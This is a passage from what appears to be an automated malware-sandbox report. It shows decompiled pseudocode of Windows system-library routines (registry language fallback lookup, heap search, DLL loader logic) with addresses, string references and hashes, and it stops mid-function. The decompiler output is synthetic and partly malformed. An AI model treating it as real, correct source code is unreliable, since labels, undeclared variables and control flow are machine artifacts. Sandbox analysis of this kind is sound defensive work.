                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 009F9891
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                • API String ID: 0-1676968949
                                                                                                                • Opcode ID: 5e9e739adaeff0824910e1a0aa391b250426845488d132ed653bfe6f16ee4fc3
                                                                                                                • Instruction ID: fa86336fae72f2116367518ed4d51acfef9ed3726b32cf591ea1a22bf9108039
                                                                                                                • Opcode Fuzzy Hash: 5e9e739adaeff0824910e1a0aa391b250426845488d132ed653bfe6f16ee4fc3
                                                                                                                • Instruction Fuzzy Hash: 81512531A087849FD721CBA8CD46B7AB7E8EF82354F240A99E9519B3E1C774ED40C791
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0099E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0099E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0099F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E009D95D0();
						}
						if(_t78 != 0) {
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E009DFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E009DBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E009D9600();
					if(_t97 < 0) {
						goto L6;
					}
					E009DBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0099F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E009DBB40(_t83, _t102 + 0x24, _t78);
								if(L009A43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E009DBB40(_t84, _t102 + 0x24, _t94);
									if(L009A43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                                0x0099e620
                                                                                                                0x0099e628
                                                                                                                0x0099e62f
                                                                                                                0x0099e631
                                                                                                                0x0099e635
                                                                                                                0x0099e637
                                                                                                                0x0099e63e
                                                                                                                0x009f5503
                                                                                                                0x009f5503
                                                                                                                0x0099e64c
                                                                                                                0x0099e64c
                                                                                                                0x0099e651
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0099e661
                                                                                                                0x0099e665
                                                                                                                0x009f542a
                                                                                                                0x0099e715
                                                                                                                0x0099e71a
                                                                                                                0x0099e71c
                                                                                                                0x0099e720
                                                                                                                0x0099e720
                                                                                                                0x0099e727
                                                                                                                0x0099e736
                                                                                                                0x0099e736
                                                                                                                0x0099e743
                                                                                                                0x0099e743
                                                                                                                0x0099e673
                                                                                                                0x0099e678
                                                                                                                0x0099e67d
                                                                                                                0x0099e682
                                                                                                                0x0099e685
                                                                                                                0x0099e692
                                                                                                                0x0099e69b
                                                                                                                0x0099e6a3
                                                                                                                0x0099e6ad
                                                                                                                0x0099e6b1
                                                                                                                0x0099e6b2
                                                                                                                0x0099e6bb
                                                                                                                0x0099e6bf
                                                                                                                0x0099e6c0
                                                                                                                0x0099e6c8
                                                                                                                0x0099e6cc
                                                                                                                0x0099e6d5
                                                                                                                0x0099e6d9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0099e6e5
                                                                                                                0x0099e6ea
                                                                                                                0x0099e6f9
                                                                                                                0x0099e70b
                                                                                                                0x0099e70f
                                                                                                                0x009f5439
                                                                                                                0x009f545e
                                                                                                                0x009f545e
                                                                                                                0x00000000
                                                                                                                0x009f545e
                                                                                                                0x009f543b
                                                                                                                0x009f543e
                                                                                                                0x009f5440
                                                                                                                0x009f5445
                                                                                                                0x009f5472
                                                                                                                0x009f5475
                                                                                                                0x009f548d
                                                                                                                0x009f5493
                                                                                                                0x009f54a9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f54ab
                                                                                                                0x009f54b4
                                                                                                                0x009f54bc
                                                                                                                0x009f54c8
                                                                                                                0x009f54de
                                                                                                                0x009f54fb
                                                                                                                0x009f54e0
                                                                                                                0x009f54e6
                                                                                                                0x009f54eb
                                                                                                                0x009f54eb
                                                                                                                0x009f54de
                                                                                                                0x00000000
                                                                                                                0x009f54bc
                                                                                                                0x009f5477
                                                                                                                0x009f547a
                                                                                                                0x009f5480
                                                                                                                0x009f5483
                                                                                                                0x009f5486
                                                                                                                0x009f548b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f548b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f5447
                                                                                                                0x009f5447
                                                                                                                0x009f5447
                                                                                                                0x009f5447
                                                                                                                0x009f544e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f5450
                                                                                                                0x009f5452
                                                                                                                0x009f5455
                                                                                                                0x009f545a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f545c
                                                                                                                0x009f546a
                                                                                                                0x009f546d
                                                                                                                0x009f546f
                                                                                                                0x00000000
                                                                                                                0x009f546f
                                                                                                                0x0099e70f

                                                                                                                Strings
                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0099E68C
                                                                                                                • InstallLanguageFallback, xrefs: 0099E6DB
                                                                                                                • @, xrefs: 0099E6C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                • API String ID: 0-1757540487
                                                                                                                • Opcode ID: 17600233e49c30e22c9b05e0a85d8fa4d5b0907d1689bccc31190fd6ddf0a387
                                                                                                                • Instruction ID: 9307b702911ce2c5edc19470b2ff1088148d9b83b1f41aff37f4525bb0381ff8
                                                                                                                • Opcode Fuzzy Hash: 17600233e49c30e22c9b05e0a85d8fa4d5b0907d1689bccc31190fd6ddf0a387
                                                                                                                • Instruction Fuzzy Hash: B2518DB25087499BCB14DF68C440B7BB3E8AF88754F06092EFA85D7250EB34DD44C7A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009BB8E4, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 60%
                                                                                                                			E009BB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0xa88748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E0099B150();
						} else {
							E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E0099B150();
						__eflags =  *0xa87bc8;
						if(__eflags == 0) {
							E00A52073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E009BAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                                                                                0x009bb8f0
                                                                                                                0x009bb8f2
                                                                                                                0x009bb8f4
                                                                                                                0x00a02c4e
                                                                                                                0x00a02c50
                                                                                                                0x00a02c56
                                                                                                                0x00a02c5c
                                                                                                                0x00a02c60
                                                                                                                0x00a02c7f
                                                                                                                0x00a02c84
                                                                                                                0x00a02c62
                                                                                                                0x00a02c77
                                                                                                                0x00a02c7c
                                                                                                                0x00a02c8a
                                                                                                                0x00a02c8f
                                                                                                                0x00a02c94
                                                                                                                0x00a02c9c
                                                                                                                0x00a02ca5
                                                                                                                0x00a02ca5
                                                                                                                0x00a02c9c
                                                                                                                0x00a02c50
                                                                                                                0x009bb8fa
                                                                                                                0x009bb902
                                                                                                                0x009bb921
                                                                                                                0x009bb921
                                                                                                                0x009bb924
                                                                                                                0x009bb924
                                                                                                                0x009bb927
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009bb929
                                                                                                                0x009bb92b
                                                                                                                0x009bb92d
                                                                                                                0x009bb940
                                                                                                                0x00000000
                                                                                                                0x009bb940
                                                                                                                0x009bb932
                                                                                                                0x009bb932
                                                                                                                0x00000000
                                                                                                                0x009bb932
                                                                                                                0x00000000
                                                                                                                0x009bb904
                                                                                                                0x009bb904
                                                                                                                0x009bb90a
                                                                                                                0x009bb90c
                                                                                                                0x009bb916
                                                                                                                0x009bb919
                                                                                                                0x009bb915
                                                                                                                0x009bb915
                                                                                                                0x009bb91b
                                                                                                                0x009bb91b
                                                                                                                0x00000000
                                                                                                                0x009bb910

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                • API String ID: 0-2558761708
                                                                                                                • Opcode ID: 31f052e57b88186ceb3bdb7e01bd65049d468f88948230e5ab9b8181f78405b9
                                                                                                                • Instruction ID: 561f87f8ab9d60c2a71f785ef89daa2dbc5def887da9819634932c33496c2195
                                                                                                                • Opcode Fuzzy Hash: 31f052e57b88186ceb3bdb7e01bd65049d468f88948230e5ab9b8181f78405b9
                                                                                                                • Instruction Fuzzy Hash: 9511E6313046019FEB28DB18D695BB9B3A9EF80B38F248429F10ACB2D1DBB4DC40D741
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009AD5E0, Relevance: 2.9, Strings: 2, Instructions: 353COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E009AD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0xa8d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E009A6600(0xa852d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0xa87b9c; // 0x0
							_t281 = L009B4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E009DF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0xa87b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0xa87b8c; // 0x532a38
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E009B2280(_t200, 0xa884d8);
									_t277 =  *0xa885f4; // 0x532f28
									_t351 =  *0xa885f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x532ec0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E009AFFB0(_t287, _t353, 0xa884d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E009ECC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E009A6600(0xa852d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E009A7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0xa8b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E00A1E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0xa88472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0xa8b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0xa8b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E009B2280(_t250, 0xa884d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L009D3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E009AFFB0(_t293, _t353, 0xa884d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E009D37F5(_t353, 0);
																}
																E009D0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E009C9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E009C02D6(_t174);
																}
																L009B77F0( *0xa87b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E009CC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L009AEC7F(_t353);
										L009C19B8(_t287, 0, _t353, 0);
										_t200 = E0099F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0xa8b2f8 |  *0xa8b2fc) == 0 || ( *0xa8b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E009DB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0xa8b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E00A46B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E00A46AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E009AE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L009AEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E009D9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E009AE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L009A8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E009D3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
